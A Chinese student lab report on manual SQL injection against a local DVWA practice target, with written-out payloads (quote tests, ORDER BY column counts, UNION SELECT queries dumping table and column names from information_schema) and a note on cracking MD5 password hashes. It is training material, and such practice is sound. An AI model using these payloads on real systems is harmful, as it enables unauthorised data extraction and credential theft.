实验目的：

掌握SQLmap 的使用 SQL注入漏洞利用

1、了解数据库的查询规则

2、熟悉SQL查询语句

3、了解SQL注入的危害性

实验设备 (环境) 

环境：phpstudy软件  dvwa靶场  Windows 10 x64

实验要求：

1.判断是否存在注入，注入是字符型还是数字型;

2.猜解当前数据库名;

3.猜解数据库中的表名;

4.猜解表中的字段名;

5.猜解数据

实验原理：

1、数据库基础

2、SQL注入漏洞利用

3、报错注入

4、盲注

5、HTTP文件头注入

6、SQLmap 的使用

实验步骤：

1.访问靶场地址http://127.0.0.1/DVWA-master/security.php，

在dvwa security选项中，可以调整dvwa的难易程度

将安全等级改为low

2.选择SQL Injection，在输入框随意输入数字查看回显

3.判断是否存在SQL注入

• 输入1提交
• 输入1'提交

• 输入1 and 1=1 提交

• 输入1 and 1=2 提交

由上可以看出是存在注入点的，并且是以单引号闭合的，

所以我们猜测sql查询语句是这样的：

Select  First name的列名and Surname的列名 from 表名 where id的列名='id'

4.判断列数

• 输入1' order by 2# 提交
• 输入1' order by 3# 提交

 由此，我们判断列数为2列

5.UNION注入

1' union select 1,2#

从上图可以看出有2个回显

6.查询当前的数据库及版本

输入 1' union select version(),database()#

 7.获取数据库中的表

1' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#或者

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#

 8.获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#

 9.获取字段中的数据

10.这里密码使用了MD5加密，可在https://www.cmd5.com/进行解密

得到密码

实验总结：

本次实验过程中，了解了其原理并掌握了其注入的方法及流程。在寻找可进行注入的URL过程中，尝试着对多个URL进行SQL注入，使用“and 1=1”及“and 1=2”确认网站是否有SQL注入漏洞，确认注入是字符型还是数字型;判断列，然后就行UNION注入，进而猜解当前数据库名，表名;字段名;从而获得数据

加油各位( •̀ ω •́ )y 期待与君再相逢

1+X 网络安全运营平台与管理 sql注入实验报告相关推荐

1. 搭建sql注入实验环境（基于windows）

   搭建服务器环境 1.下载xampp包 地址:http://www.apachefriends.org/zh_cn/xampp.html 很多人觉得安装服务器是件不容易的事,特别是要想添加MySql, ...

2. 【操作系统】内存管理设计性实验报告

   操作系统#内存管理设计性实验报告 正文 一. 实验目的 1.通过本次试验体会操作系统中内存的分配模式: 2.掌握内存分配的方法(首次适应(FF),最佳适应(BF),最差适应(WF)): 3.学会进程的 ...

3. 02 SQL语言 实验报告

   02 SQL语言 实验报告 广州大学学生实验报告 开课学院及实验室:计算机科学与工程实验室418B室         2018年05月 09 日 学院 计算机科学与教育软件 年级.专业.班 网络*** ...

4. 计算机操作系统进程同步实验报告,操作系统-进程管理与进程同步-实验报告

   进程管理与进程同步实验报告 实验一.进程管理与进程同步 一.实验目的 了解进程管理的实现方法,理解和掌握处理进程同步问题的方法. 二.实验内容 实现银行家算法.进程调度过程的模拟.读者-写者问题的写者 ...

5. 【网络安全】php代码审计-sql注入进阶篇

   前言 经过上一篇文章我们已经大概的了解sql注入去怎样审计了.但是在实际的网站中和用户的输入输出接口不可能想那样没有防御措施的.现在各大网站都在使用waf对网站或者APP的业务流量进行恶意特征识别及防 ...

6. 网络安全-靶机dvwa之sql注入Low到High详解（含代码分析）

   目录 SQL Injection-LOW Union注入 注入点判断 字段判断 获取数据库名 获取表名 获取列名 获取数据 Error注入 获取表名 获取列名 获取数据 源码解析 主要步骤 漏洞原因 ...

7. Web网络安全漏洞分析，SQL注入原理详解

   本文主要为大家介绍了Web网络安全漏洞分析SQL注入的原理详解,有需要的朋友可以借鉴参考下,希望能够有所帮助,祝大家多多进步,早日升职加薪 一.SQL注入的基础 1.1 介绍SQL注入 SQL注入就是 ...

8. SEED实验系列：Collabtive系统SQL注入实验

   本课程原文链接为:https://www.shiyanlou.com/courses/291,实验楼已经为此课程的实践提供了在线实验环境,想要尝试体验的,可以直接前往实验楼进行实践操作. 你能够喜欢我 ...

9. mysql注入实验报告_网络安全实验报告 第二章

   利用TCP协议实现synflood攻击 运行syn攻击程序,以靶机为目标主机对其发送syn数据包,查看目标主机状态. 利用xdos工具进行攻击 首先在192.168.1.3的目标机器上打开wiresh ...

最新文章

1. ThreadLocalRandom 安全吗
2. python编程语言能干什么-python编程语言的优势与劣势--python能干啥
3. 2009-08-19股市大跌分析（转载）
4. Python matplotlib pyplot中title() xlabel() ylabel()无法显示在中文（方框乱码）的解决办法
5. mac系统如何进入系统偏好设置_MacOS Big Sur 系统偏好设置无法解锁Bug解决
6. 机器学习:算法视角pdf_何时使用不同的机器学习算法：简单指南
7. 单进程服务器-epoll版
8. Visual Studio、.NET Framework、VC++、C#各个版本的对应关系
9. html密码框输入内容隐藏,密码框显示提示文字的功能实现
10. 携程第二场预赛 1003:位图像素的颜色（水题，判断点是否在矩形内）
11. [渝粤教育] 郑州财税金融职业学院 玩转e时代 参考 资料
12. 关于Linux的目次结构及干系分区成绩
13. 《DB 查询分析器》使用技巧之（七）
14. OSPF计算环路:RFC:2328与RFC1583
15. centos安装python3.8.1_centos6.6下安装python3.8.1后报错？?报错-问答-阿里云开发者社区-阿里云...
16. 遍地是钱，为什么捡不到？
17. 计算机取小数点后的小数 公式,excel表格公式计算后取小数点后的位数 | excle小数个数...
18. sqli-labs48关_Open Labs带来48小时骇客马拉松
19. ESP32学习【2】——ESP32固件烧录及相关问题解决
20. 计算机技术工种技师,中级及以上专业技术职务或者具有技师以上职业资格具体包括哪些职务和资格...

热门文章

1. Qt python局域网聊天（二）
2. 【二叉树】大学有棵树叫高数,数据结构也有棵二叉树-代码详解
3. 第二家东南亚美股上市公司诞生，Grab为何上市即大跌？
4. Launch screens may not set custom classnames
5. 4..Struts2_标签
6. 《遥感原理与应用》总结——遥感图像目视判读
7. 论坛discuz建站视频教程共90集
8. 计算机机房联合接地线用什么线,机房中 机柜设备外壳为什么接地？ 机房如何做接地？...
9. 使用github API的简单github个人资料页面显示应用程序，以及使用bloc模式的flutter...
10. MATSim笔记01-controler结构梳理